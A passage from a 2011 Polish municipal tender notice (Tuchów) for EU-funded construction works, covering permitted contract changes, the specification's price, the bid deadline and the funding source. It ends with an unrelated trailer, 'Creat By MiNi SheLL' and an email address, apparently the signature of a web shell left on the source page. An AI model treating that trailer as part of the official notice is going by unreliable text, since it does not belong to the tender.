<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1).Projekt  umowy stanowi załącznik do Specyfikacji  Istotnych  Warunków Zamówienia.  W jej treści, która nie podlega negocjacjom podano wszelkie istotne dla zamawiającego warunki realizacji zamówienia.
2).Zamawiający  przewiduje  możliwość  wprowadzenia  zmian  do  zawartej  umowy  w  stosunku  do  treści  oferty w następujących  okolicznościach:
1.Konieczności  wykonania  robót  budowlanych  w  przypadku:
a) wystąpieniem  w  trakcie  realizacji  niniejszej  umowy  konieczności  wykonania  robót  dodatkowych, nie  objętych  zamówieniem  podstawowym, których  wykonanie  stanie  się  konieczne  na  skutek  sytuacji  niemożliwej  wcześniej  do  przewidzenia, a  wykonanie  zamówienia  podstawowego  będzie  uzależnione  od  wykonania  zamówienia  dodatkowego.
b) działaniem  zdarzeń  losowych
c). niekorzystnymi  warunkami  atmosferycznymi  uniemożliwiającymi  przeprowadzenie  w  terminie  ustalonych robót  budowlanych
d). gdy  w  wyniku  rozliczenia    udzielonej  dotacji   i  wynikającym  stąd  ostatecznym  terminem rozliczenia nie  jest  możliwe  dotrzymanie  umownego  terminu  wykonania  umowy

2.Zmniejszenia  zakresu  umownego  robót  z  przyczyn  technicznych  lub  gospodarczych  niemożliwych  wcześniej do  przewidzenia  przez  Zamawiającego
3.Zmniejszenia  wysokości  wynagrodzenia   przewidzianego  w  umowie, spowodowanego  koniecznością zmniejszenia  zakresu  umownego  robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuchow.BIP Tuchow/Zamówienia  publiczne+ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie, 33-170 Tuchów ul. Rynek 1. Cena  materiałów  przetargowych  wynosi  50,00 złotych - wersja papierowa u Zamawiającego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2011 godzina 10:00, miejsce: Urząd Miejski w Tuchowie, 33-170 Tuchów ul. Rynek 1, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejszy  projekt  realizowany  jest  w  oparciu  umowę  o  przyznanie  pomocy  nr  00117-6922-UM0600080/09  w  ramach  działania  Odnowa  i  rozwój  wsi  objętego  PROW  na  lata  2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com